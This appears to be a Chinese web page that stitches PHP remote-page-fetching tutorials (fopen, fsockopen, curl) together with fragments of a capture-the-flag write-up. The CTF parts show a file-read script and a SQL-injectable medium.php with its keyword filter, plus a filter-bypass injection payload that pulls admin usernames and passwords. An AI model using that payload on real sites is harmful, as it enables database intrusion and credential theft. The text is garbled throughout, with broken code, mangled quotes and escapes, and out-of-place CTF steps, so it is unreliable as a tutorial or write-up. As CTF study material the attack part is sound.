Bugscan擂赛-12

}?本站原创: 转载请注明来处.

图片 1

以上两个代码片段都直接Copy回去运行就知道效果了,上面的例子只是抓取网页数据的雏形,要使其更适合自己的使用,情况有各异.所以,在此各位程序爱好者自己好好研究一下吧.

稍微有点意义的函数是:get_content_by_socket(), get_url(),
get_content_url(), get_content_object
几个函数,也许能够给你点什么想法。
复制代码 代码如下:

//获取所有内容url保存到文件
function get_index($save_file, $prefix=”index_”){
$count = 68;
$i = 1;
if (file_exists($save_file)) @unlink($save_file);
$fp = fopen($save_file, “a+”) or die(“Open “. $save_file .”
failed”);
while($i$url = $prefix . $i .”.htm”;
echo “Get “. $url .”…”;
$url_str = get_content_url(get_url($url));
echo ” OKn”;
fwrite($fp, $url_str);
++$i;
}
fclose($fp);
}
//获取目标多媒体对象
function get_object($url_file, $save_file, $split=”|–:**:–|”){
if (!file_exists($url_file)) die($url_file .” not exist”);
$file_arr = file($url_file);
if (!is_array($file_arr) || empty($file_arr)) die($url_file .” not
content”);
$url_arr = array_unique($file_arr);
if (file_exists($save_file)) @unlink($save_file);
$fp = fopen($save_file, “a+”) or die(“Open save file “. $save_file .”
failed”);
foreach($url_arr as $url){
if (empty($url)) continue;
echo “Get “. $url .”…”;
$html_str = get_url($url);
echo $html_str;
echo $url;
exit;
$obj_str = get_content_object($html_str);
echo ” OKn”;
fwrite($fp, $obj_str);
}
fclose($fp);
}
//遍历目录获取文件内容
function get_dir($save_file, $dir){
$dp = opendir($dir);
if (file_exists($save_file)) @unlink($save_file);
$fp = fopen($save_file, “a+”) or die(“Open save file “. $save_file .”
failed”);
while(($file = readdir($dp)) != false){
if ($file!=”.” && $file!=”..”){
 echo “Read file “. $file .”…”;
 $file_content = file_get_contents($dir . $file);
 $obj_str = get_content_object($file_content);
 echo ” OKn”;
 fwrite($fp, $obj_str);
}
}
fclose($fp);
}
//获取指定url内容
function get_url($url){
$reg = ‘/^http://[^/].+$/’;
if (!preg_match($reg, $url)) die($url .” invalid”);
$fp = fopen($url, “r”) or die(“Open url: “. $url .” failed.”);
while($fc = fread($fp, 8192)){
$content .= $fc;
}
fclose($fp);
if (empty($content)){
die(“Get url: “. $url .” content failed.”);
}
return $content;
}
//使用socket获取指定网页
function get_content_by_socket($url, $host){
$fp = fsockopen($host, 80) or die(“Open “. $url .” failed”);
$header = “GET /”.$url .” HTTP/1.1rn”;
$header .= “Accept: */*rn”;
$header .= “Accept-Language: zh-cnrn”;
$header .= “Accept-Encoding: gzip, deflatern”;
$header .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1; Maxthon; InfoPath.1; .NET CLR 2.0.50727)rn”;
$header .= “Host: “. $host .”rn”;
$header .= “Connection: Keep-Alivern”;
//$header .= “Cookie: cnzz02=2; rtime=1; ltime=1148456424859;
cnzz_eid=56601755-rnrn”;
$header .= “Connection: Closernrn”;
fwrite($fp, $header);
while (!feof($fp)) {
$contents .= fgets($fp, 8192);
}
fclose($fp);
return $contents;
}
//获取指定内容里的url
function get_content_url($host_url, $file_contents){
//$reg =
‘/^(#|javascript.*?|ftp://.+|http://.+|.*?href.*?|play.*?|index.*?|.*?asp)+$/i’;
//$reg = ‘/^(down.*?.html|d+_d+.htm.*?)$/i’;
$rex =
“/([hH][rR][eE][Ff])s*=s*[‘”]*([^>'”s]+)[“‘>]*s*/i”;
$reg = ‘/^(down.*?.html)$/i’;
preg_match_all ($rex, $file_contents, $r);
$result = “”; //array();
foreach($r as $c){
if (is_array($c)){
 foreach($c as $d){
if (preg_match($reg, $d)){ $result .= $host_url . $d.”n”; }
 }
}
}
return $result;
}
//获取指定内容中的多媒体文件
function get_content_object($str, $split=”|–:**:–|”){
$regx =
“/hrefs*=s*[‘”]*([^>'”s]+)[“‘>]*s*(.*?)/i”;
preg_match_all($regx, $str, $result);
if (count($result) == 3){
$result[2] = str_replace(“多媒体: “, “”, $result[2]);
$result[2] = str_replace(“
“, “”, $result[2]);
$result = $result[1][0] . $split .$result[2][0] . “n”;
}
return $result;
}
?>

======================================================
同一域名对应多个IP时,PHP获取远程网页内容的函数
fgc就是简单的读取过来,把一切操作封装了
fopen也进行了一些封装,但是需要你循环读取得到所有数据。
fsockopen这是直板板的socket操作。
如果仅仅是读取一个html页面,fgc更好。
如果公司是通过防火墙上网,一
般的file_get_content函数就不行了。当然,通过一些socket操作,直接向proxy写http请求也是可以的,但是比较麻烦。
如果你能确认文件很小,可以任选以上两种方式fopen
,join(”,file($file));。比如,你只操作小于1k的文件,那最好还是用file_get_contents吧。

?phprequire_once(s/s.php);$a_id=get_value(‘id’,”);if(is_numeric($a_id)
){$result=mysql_query(Select * from s where id=’$a_id’) or
die(mysql_error());if( mysql_num_rows($result)
){$rs=mysql_fetch_array( $result );$swfpath=$rs[5];}}function
Get_swf($url){$data = file_get_contents($url);header(content-type:
application/x-shockwave-flash);echo $data;

<pre>soid=1//aandnd//1>2//ununionion//selselectect//1,2,3,group_concat(usernanameme,userpapassss)//frfromom//adadminmin//limit/**/0,1</pre>
得到

如果确定文件很大,或者不能确定文件的大小,那就最好使用文件流了。fopen一个1K的文件和fopen一个1G的文件没什么明显的区别。内容长,就可以花更长的时间去读,而不是让脚本死掉。

PHP获取远程网页内容有多种方式,例如用自带的file_get_contents、fopen等函数。
复制代码 代码如下:

echo file_get_contents(“”);
?>

但是,在DNS轮询等负载均衡中,同一域名,可能对应多台服务器,多个IP。假设blog.s135.com被DNS解析到
72.249.146.213、72.249.146.214、72.249.146.215三个IP,用户每次访问blog.s135.com,系统会根据负载均衡的相应算法访问其中的一台服务器。
上周做一个视频项目时,就碰到这样一类需求:需要依次访问每台服务器上的一个PHP接口程序(假设为abc.php),查询这台服务器的传输状态。
这时就不能直接用file_get_contents访问
而采用依次访问
Server配有多个虚拟主机时,也是不行的。
通过设置本地hosts也不行,因为hosts不能设置多个IP对应同一个域名。
那就只有通过PHP和HTTP协议来实现:访问abc.php时,在header头中加上blog.s135.com域名。于是,我写了下面这个PHP函数:
复制代码 代码如下:

 /************************
 * 函数用途:同一域名对应多个IP时,获取指定服务器的远程网页内容
 * 参数说明:
 * $ip服务器的IP地址
 * $host服务器的host名称
 * $url服务器的URL地址(不含域名)
 * 返回值:
 * 获取到的远程网页内容
 * false访问远程网页失败
 ************************/
 function HttpVisit($ip, $host, $url)
 {
$errstr = ”;
$errno = ”;
$fp = fsockopen ($ip, 80, $errno, $errstr, 90);
if (!$fp)
{
 return false;
}
else
{
$out = “GET {$url} HTTP/1.1rn”;
$out .= “Host:{$host}rn”;
$out .= “Connection: closernrn”;
fputs ($fp, $out);

while($line = fread($fp, 4096)){
$response .= $line;
}
fclose( $fp );

//去掉Header头信息
$pos = strpos($response, “rnrn”);
$response = substr($response, $pos + 4);

return $response;
}
 }

 //调用方法:
 $server_info1 = HttpVisit(“72.249.146.213”, “blog.s135.com”,
“/abc.php”);
 $server_info2 = HttpVisit(“72.249.146.214”, “blog.s135.com”,
“/abc.php”);
 $server_info3 = HttpVisit(“72.249.146.215”, “blog.s135.com”,
“/abc.php”);
 ?>

php
file_get_contents读取远程文件并输出,这样做的好得就是不会在flash播放代码中显示对方网站的文件地址,下面是我自己用的一个.是读取方视频文件用的.

TIM截图20170322175323.png

functionget_url($url,$cookie=false){
$url=parse_url($url);
$query=$url[path].”?”.$url[query];
ec(“Query:”.$query);
$fp=fsockopen($url[host],$url[port]?$url[port]:80,$errno,$errstr,30);
if(!$fp){
returnfalse;
}else{
$request=”GET$queryHTTP/1.1rn”;
$request.=”Host:$url[host]rn”;
$request.=”Connection: Closern”;
if($cookie)$request.=”Cookie:$cookien”;
$request.=”rn”;
fwrite($fp,$request);
while(!@feof($fp)){
$result.=@fgets($fp,1024);
}
fclose($fp);
return$result;
}
}
//获取url的html部分,去掉header
functionGetUrlHTML($url,$cookie=false){
$rowdata=get_url($url,$cookie);
if($rowdata)
{
 $body=stristr($rowdata,”rnrn”);
 $body=substr($body,4,strlen($body));
 return$body;
}
returnfalse;
}
?>

根据过滤规则可以用ununionion的方式绕过关键字的过滤,用/**/注释绕过空格的过滤。

functionprintarr(array$arr)
{
echo”
Row field count: “.count($arr).”
“;
foreach($arras$key=>$value)
{
echo”$key=$value
“;
}
}
?>

<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″
/>
<?php
$file = $_GET[‘file’];
if ($file == “” || strstr($file, ‘Conf/xycms.inc.php’)) {
echo “想多了,数据库信息能让你看”;
exit;
} else {
$cut = strchr($file, “login”);
if ($cut == false) {
$data = file_get_contents($file);
$date = htmlspecialchars($data);
echo $date;
} else {
echo “<script>alert(‘你弄到敏感目录了’)</script>”;
}
}
?></pre>
伪代码读取,而且发现存在login目录。然后发现其他的几个文件,比较重要的有medium.php存在sql注入
<pre><?php
if ($_SERVER[‘HTTP_USER_AGENT’] != “seclover Browser”) {
echo ‘没用的!!!’;
exit;
}
$id = $_POST[‘soid’];
include ‘Conf/xycms.inc.php’;
include ‘seclover.php’;
include ‘filter.php’;
$id = seclover($id);
$con = mysql_connect($db_address, $db_user, $db_pass) or
die(“不能连接到数据库!!” . mysql_error());
mysql_select_db($db_name, $con);
$id = mysql_real_escape_string($id);
$sql = “SELECT * FROM message WHERE display=1 AND id={$id}”;
//echo $sql;
$result = mysql_query($sql);
$rs = mysql_fetch_array($result);
echo htmlspecialchars($rs[‘nice’]) . ‘:
‘ . filter($rs[‘say’]) . ‘<br />’;
mysql_free_result($result);
//mysql_free_result($file);
mysql_close($con);
?> </pre>
seclover.php过滤规则
<pre><?php
function seclover($content)
{
$keyword = array(“select”, “union”, “and”, “from”, ‘ ‘, “‘”, “;”, ‘”‘,
“char”, “or”, “count”, “master”, “name”, “pass”, “admin”, “+”, “-“,
“order”, “=”);
$info = strtolower($content);
for ($i = 0; $i <= count($keyword); $i++) {
$info = str_replace($keyword[$i], ”, $info);
}
return $info;
}</pre>
所以可以利用搜索功能进行注入,由于medium.php对UA进行验证所以抓包改一下UA得到:

关于curl库:
curl官方网站
curl 是使用URL语法的传送文件工具,支持FTP、FTPS、HTTP HTPPS SCP SFTP
TFTP TELNET DICT FILE和LDAP。curl 支持SSL证书、HTTP POST、HTTP PUT 、FTP
上传,kerberos、基于HTT格式的上传、代理、cookie、用户+口令证明、文件传送恢复、http代理通道和大量其他有用的技巧
复制代码 代码如下:

图片 2

functionHTTP_Post($URL,$data,$cookie,$referrer=””){
// parsing the given URL
$URL_Info=parse_url($URL);
// Building referrer
if($referrer==””)// if not given use this script. as referrer
$referrer=”111″;
// making string from $data
foreach($dataas$key=>$value)
$values[]=”$key=”.urlencode($value);
$data_string=implode(“&”,$values);
// Find out which port is needed – if not given use standard (=80)
if(!isset($URL_Info[“port”]))
$URL_Info[“port”]=80;
// building POST-request:
$request.=”POST “.$URL_Info[“path”].” HTTP/1.1n”;
$request.=”Host: “.$URL_Info[“host”].”n”;
$request.=”Referer:$referern”;
$request.=”Content-type: application/x-www-form-urlencodedn”;
$request.=”Content-length: “.strlen($data_string).”n”;
$request.=”Connection: closen”;
$request.=”Cookie:$cookien”;
$request.=”n”;
$request.=$data_string.”n”;
$fp=fsockopen($URL_Info[“host”],$URL_Info[“port”]);
fputs($fp,$request);
while(!feof($fp)){
$result.=fgets($fp,1024);
}
fclose($fp);
return$result;
}
printhr();
?>

图片 3

示例代码6:使用curl库,使用curl库之前,你可能需要查看一下php.ini,查看是否已经打开了curl扩展
复制代码 代码如下:

TIM截图20170322163354.png

======================================================
PHP抓取远程网站数据的代码
现在可能还有很多程序爱好者都会遇到同样的疑问,就是要如何像搜索引擎那样去抓取别人网站的HTML代码,然后把代码收集整理成为自己有用的数据!今天就等我介绍一些简单例子吧.
Ⅰ.抓取远程网页标题的例子:
以下是代码片段:
复制代码 代码如下:
/*
+————————————————————-
+抓取网页标题的代码,直接拷贝本代码片段,另存为.php文件执行即可.
+————————————————————-
*/
error_reporting(7);
$file = fopen (“”, “r”);
if (!$file) {
echo “Unable to open remote file.n”;
exit;
}
while (!feof ($file)) {
$line = fgets ($file, 1024);
if (eregi (“

TIM截图20170322164709.png

Ⅱ.抓取远程网页HTML代码的例子:
以下是代码片段:
复制代码 代码如下:
php
/*
+—————-
+DNSing Sprider
+—————-
*/
$fp = fsockopen(“www.dnsing.com”, 80, $errno, $errstr, 30);
if (!$fp) {
echo “$errstr ($errno)
n”;
} else {
$out = “GET / HTTP/1.1rn”;
$out .= “Host:www.dnsing.comrn”;
$out .= “Connection: Close rnrn”;
fputs($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
}
//End
?>

得到flag文件 ,然后利用cat输出flag:

$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, ”);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
echo $file_contents;
?>

发表评论

电子邮件地址不会被公开。 必填项已用*标注